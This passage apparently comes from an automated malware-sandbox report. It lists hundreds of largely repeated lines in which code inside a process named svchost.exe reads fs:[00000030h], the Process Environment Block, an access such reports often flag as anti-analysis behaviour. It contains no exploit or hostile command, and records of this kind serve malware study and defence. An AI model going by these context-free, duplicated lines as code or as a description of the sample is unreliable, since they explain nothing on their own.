                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE10E mov eax, dword ptr fs:[00000030h]7_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDE10E mov ecx, dword ptr fs:[00000030h]7_2_03CDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDA118 mov ecx, dword ptr fs:[00000030h]7_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDA118 mov eax, dword ptr fs:[00000030h]7_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDA118 mov eax, dword ptr fs:[00000030h]7_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CDA118 mov eax, dword ptr fs:[00000030h]7_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CF0115 mov eax, dword ptr fs:[00000030h]7_2_03CF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C60124 mov eax, dword ptr fs:[00000030h]7_2_03C60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB20DE mov eax, dword ptr fs:[00000030h]7_2_03CB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2A0E3 mov ecx, dword ptr fs:[00000030h]7_2_03C2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C380E9 mov eax, dword ptr fs:[00000030h]7_2_03C380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB60E0 mov eax, dword ptr fs:[00000030h]7_2_03CB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C2C0F0 mov eax, dword ptr fs:[00000030h]7_2_03C2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C720F0 mov ecx, dword ptr fs:[00000030h]7_2_03C720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C3208A mov eax, dword ptr fs:[00000030h]7_2_03C3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CC80A8 mov eax, dword ptr fs:[00000030h]7_2_03CC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CF60B8 mov eax, dword ptr fs:[00000030h]7_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CF60B8 mov ecx, dword ptr fs:[00000030h]7_2_03CF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C32050 mov eax, dword ptr fs:[00000030h]7_2_03C32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB6050 mov eax, dword ptr fs:[00000030h]7_2_03CB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C5C073 mov eax, dword ptr fs:[00000030h]7_2_03C5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CB4000 mov ecx, dword ptr fs:[00000030h]7_2_03CB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD2000 mov eax, dword ptr fs:[00000030h]7_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD2000 mov eax, dword ptr fs:[00000030h]7_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD2000 mov eax, dword ptr fs:[00000030h]7_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD2000 mov eax, dword ptr fs:[00000030h]7_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD2000 mov eax, dword ptr fs:[00000030h]7_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD2000 mov eax, dword ptr fs:[00000030h]7_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD2000 mov eax, dword ptr fs:[00000030h]7_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03CD2000 mov eax, dword ptr fs:[00000030h]7_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4E016 mov eax, dword ptr fs:[00000030h]7_2_03C4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_03C4E016 mov eax, dword ptr fs:[00000030h]7_2_03C4E016
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C4E016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C4E016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C2A020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C2C020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CC6030 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C3C7C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CB07C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C527ED mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C527ED mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C527ED mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CBE7E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C347FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C347FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CD678E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C307AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CE47A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6674D mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6674D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6674D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C30750 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CBE75D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C72750 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C72750 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CB4755 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C38770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C40770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C40770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C40770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C40770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C40770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C40770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C40770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C40770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C40770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C40770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C40770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C40770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6C700 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C30710 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C60710 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6C720 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6C720 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6273C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6273C mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6273C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CAC730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6A6C7 mov ebx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6A6C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CAE6F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CB06F1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CB06F1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C34690 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C34690 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6C6A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C666B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C4C640 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CF866E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CF866E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6A660 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6A660 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C62674 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CAE609 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C4260B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C4260B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C4260B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C4260B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C4260B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C4260B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C4260B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C72619 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C4E627 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C66620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C68620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C3262C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6E5CF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6E5CF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C365D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6A5D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C5E5E7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C325E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6C5ED mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6C5ED mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C32582 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C32582 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C64588 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6E59C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CB05A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CB05A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CB05A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C545B1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C545B1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C38550 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C38550 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6656A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6656A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6656A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CC6500 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03D04500 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03D04500 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03D04500 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03D04500 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03D04500 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03D04500 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03D04500 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C40535 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C40535 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C40535 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C40535 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C40535 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C40535 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C5E53E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C5E53E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C5E53E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C5E53E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C5E53E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C304E5 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CEA49A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C364AB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C644B0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CBA4B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6E443 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6E443 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6E443 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6E443 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6E443 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6E443 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6E443 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6E443 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CEA456 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C2645D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C5245A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CBC460 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C5A470 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C5A470 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C5A470 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C68402 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C68402 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C68402 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C2E420 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C2E420 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C2E420 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C2C427 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CB6420 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CB6420 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CB6420 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CB6420 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CB6420 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CB6420 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CB6420 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6A430 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C50BCB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C50BCB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C50BCB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C30BCD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C30BCD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C30BCD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CDEBD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C38BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C38BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C38BF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C5EBFC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CBCBF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C40BBE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C40BBE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CE4BB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CE4B4B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CE4B4B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CC6B40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CC6B40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CFAB40 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CD8B42 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CDEB50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C2CB7E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CAEB1D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C5EB20 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C5EB20 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CF8B28 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03CF8B28 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C86ACC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C86ACC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C86ACC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C30AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C64AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C64AD0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6AAEE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C6AAEE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C3EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C3EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C3EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C3EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C3EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C3EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C3EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C3EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03C3EA80 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe, Code function: 7_2_03D04A80 mov eax, dword ptr fs:[00000030h]
